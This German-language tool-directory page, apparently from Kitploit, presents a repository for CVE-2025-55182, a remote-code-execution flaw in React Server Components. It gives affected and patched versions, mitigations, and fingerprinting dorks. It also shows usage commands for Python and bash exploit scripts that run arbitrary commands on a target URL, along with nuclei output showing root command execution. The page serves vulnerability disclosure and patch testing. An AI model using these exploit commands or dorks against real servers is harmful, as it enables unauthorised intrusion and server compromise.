Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-55182 — Eine kritische Remote-Codeausführungs-Schwachstelle (RCE), die die Implementierung von React Server Components (RSC) in mehreren Paketen betrifft, einschließlich | Kitploit
Tools/GitHubGitHub/cyberleelawat/cve-2025-55182
SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubcyberleelawat/cve-2025-55182

CVE-2025-55182

Eine kritische Remote-Codeausführungs-Schwachstelle (RCE), die die Implementierung von React Server Components (RSC) in mehreren Paketen betrifft, einschließlich

11vor 2 MonatenNoch nicht geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-55182 – Remotecodeausführung in React Server Components

React2Shell Banner CVE-2025-55182 CVE-2025-66478 CVSS

Erstellt von : Virendra Kumar

Unternehmen : Cyber Leelawat

Website :

www.cyberleelawat.in

Überblick

CVE-2025-55182 ist eine kritische Schwachstelle zur Remotecodeausführung (RCE), die die Implementierung der React Server Components (RSC) in mehreren Paketen betrifft, darunter:

  • react-server-dom-webpack
  • react-server-dom-turbopack
  • react-server-dom-parcel

Die Schwachstelle besteht aufgrund einer unsicheren Deserialisierung von Nutzdaten, die über das interne Flight-Protokoll von RSC gesendet werden. Wenn bestimmte nicht vertrauenswürdige Eingaben über HTTP-Anfragen durch React Server Components fließen, kann eine serverseitige Codeausführung ausgelöst werden.

Die betroffenen Versionen umfassen:

  • 19.0.0
  • 19.1.0
  • 19.1.1
  • 19.2.0

Die gepatchten Versionen umfassen:

  • 19.0.1
  • 19.1.2
  • 19.2.1

So funktioniert die Schwachstelle (auf hoher Ebene)

React Server Components akzeptieren clientseitige Anfragen, die im Backend geparst und deserialisiert werden. Die Schwachstelle entsteht durch unzureichende Kontrollen bei der Deserialisierung eingehender Daten, wodurch speziell präparierte Nutzdaten als ausführbare serverseitige Komponenten interpretiert werden können.

In diesem Fall kann auf dem Server beliebiger JavaScript-Code ausgeführt werden, was je nach Hosting-Umgebung und Berechtigungen zu einer vollständigen Kompromittierung des Servers führen kann.


Grundursache

  • Fehlende ordnungsgemäße Eingabevalidierung in RSC-Flight-Protokollströmen.
  • Die Server-Vertrauensgrenze wurde fälschlicherweise als sicher angenommen.
  • Unsicheres serverseitiges Parsen nicht vertrauenswürdiger Benutzereingaben.

Auswirkungen

Bei Ausnutzung könnte ein Angreifer in der Lage sein:

  • Remotecodeausführung zu erreichen
  • Beliebige serverseitige Befehle auszuführen
  • Auf Datenbank- oder Betriebssystemressourcen zuzugreifen
  • Schadsoftware oder Hintertüren zu installieren
  • Sensible Daten zu stehlen
  • Laterale Bewegungen innerhalb der Infrastruktur durchzuführen

CVSS-Score: 10.0 – KRITISCH


Manuelles Testen (Sichere defensive Identifizierung)

Primäres Ziel:

Überprüfen, ob die Anwendung React Server Components offenlegt und ob betroffene Versionen verwendet werden.

Schritt 1 — RSC-Vorhandensein anhand von Antwortmerkmalen prüfen

root@kitploit:~
curl -I https://target.com/?__rsc=1

Google-Aufklärung (defensive Suchbegriffe)

Diese Suchbegriffe helfen dabei festzustellen, ob ein öffentlich zugängliches Repository oder eine Webanwendung auf RSC-Komponenten verweist.

root@kitploit:~
"React Server Components" "Flight" inurl:src
"react-server-dom-webpack" filetype:lock
"server.references" "react"
"rsc" "react-dom"

Prüfen:

  • Sind RSC-Funktionen vorhanden?
  • Sind Pakete in Frontend-Bundles sichtbar?
  • Öffentliche Git-Referenzen?

Beispielhafte interne Google-Abfragen (nur für den eigenen Zuständigkeitsbereich)

root@kitploit:~
site:yourdomain.com "react-server"
site:yourdomain.com "flight" "react"
site:yourdomain.com "rsc"

Nur für die interne Prüfung der Domäne Ihrer eigenen Organisation gedacht.


Shodan (SICHERES Technologie-Fingerprinting)

Prüft die Nutzung offengelegter Frameworks, nicht die Ausnutzung von Schwachstellen.

root@kitploit:~
http.title:"Next.js"
"powered by" "Next.js"
X-Powered-By: Next.js
http.favicon.hash=

FOFA Nur Technologieklassifizierung

root@kitploit:~
title="Next.js"
header="next-router-state-tree"
body="/_next/static/"
server="next"

Automatisiertes Testen (Intern / Labor)

Um defensives Scannen zu automatisieren, klonen Sie die vorlagenbasierte Erkennungslogik für Ihre eigene Infrastrukturbewertung:

root@kitploit:~
git clone https://github.com/cyberleelawat/CVE-2025-55182.git
cd CVE-2025-55182

Nuclei-Vorlage

root@kitploit:~
$ nuclei -u http://localhost:3001 -t cve-2025-55182.yaml

[cve-2025-55182:command_output] [http] [critical] http://localhost:3001 ["uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)"]
[INF] Scan completed in 28.35483ms. 1 matches found.

Python-RCE-Exploit (CVE-2025-55182.py)

Vollwertiges RCE-Exploit-Skript, das beliebige Befehle ausführt und die Ausgabe abruft.

Verwendung:

root@kitploit:~
python3 CVE-2025-55182.py http://target.com:3000 -c "id"
python3 CVE-2025-55182.py https://target.com -c "whoami" --no-check-ssl
python3 CVE-2025-55182.py 192.168.1.100:3000 -c "uname -a"

Bash-Exploit

Installation

root@kitploit:~
chmod +x scanner.sh

Verwendung

root@kitploit:~
# Scan with default command (id)
./scanner.sh -d example.com

# Execute custom command
./scanner.sh -d example.com -c "whoami"

# With full URL
./scanner.sh -d https://example.com -c "uname -a"

Optionen

  • -d, --domain - Zieldomäne/URL (erforderlich)
  • -c, --command - Auszuführender Befehl (Standard: id)

Beispiele

root@kitploit:~
# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com

# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"

# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"

Voraussetzungen

  • Bash

  • curl

  • openssl

    Danksagung: Bash- und Python-Skript ursprünglich erstellt von @zack0x01 und @sickwell. Mit Wertschätzung verwendet.

Die Vorlagen im Repository sind bestimmt für:

  • Versionsidentifizierung
  • Sichtbarkeitsprüfungen
  • Infrastrukturinventar
  • Sensibilisierung für Schwachstellen

WICHTIG: Diese Vorlagen dürfen nur auf Systemen ausgeführt werden, die Ihnen gehören oder für deren Bewertung Sie autorisiert sind.


Nuclei (Hinweis zur defensiven Nutzung)

Die in diesem Repository enthaltenen Nuclei-Vorlagen sind ausschließlich bestimmt für:

  • Validierung von Abhängigkeitsversionen
  • indirektes Fingerprinting
  • passive Prüfungen
  • interne Sicherheitsprüfungen

Bitte stellen Sie sicher:

  • dass Sie eine schriftliche Genehmigung haben
  • dass Sie nur Ihre eigenen Assets scannen
  • dass Sie lokale Gesetze und Richtlinien einhalten

Empfohlene Gegenmaßnahmen

Sofort aktualisieren

Führen Sie ein Upgrade auf eine der gepatchten Versionen durch:

  • 19.0.1
  • 19.1.2
  • 19.2.1

Wenn Sie nicht sofort patchen können

  • RSC-Funktionen vorübergehend deaktivieren
  • Serverkomponenten isolieren
  • WAF-Regeln implementieren
  • Die offengelegte Netzwerkoberfläche einschränken

🤝 Verbinde dich mit mir

👨‍💻 Cyber Leelawat

Sicherheitsforscher • Cyber-Sicherheitstrainer • Bug-Bounty-Jäger

Motto: Zero Trust Full Secure 🚀

GitHub Instagram
LinkedIn WhatsApp Channel
WhatsApp Group

Fazit

CVE-2025-55182 ist derzeit eine der kritischsten Bedrohungen für React-basierte Infrastrukturen. Aufgrund des trivialen Ausnutzungsvektors und der nicht authentifizierten Angriffsfläche wird ein sofortiges Patchen dringend empfohlen. Jede Organisation, die betroffene RSC-Versionen betreibt, sollte eine Notfall-Priorisierung in Betracht ziehen.


Rechtlicher / Ethischer Hinweis

Dieses Repository und die Dokumentation dienen der defensiven Forschung und der Sicherheitsvalidierung von Assets, die Ihnen gehören. Jede missbräuchliche Verwendung kann rechtswidrig sein. Sie sind dafür verantwortlich, Gesetze und organisatorische Richtlinien einzuhalten.

Mit ❤️ erstellt von Cyber Leelawat

Zero Trust Full Secure 🎯🔐

Tool herunterladen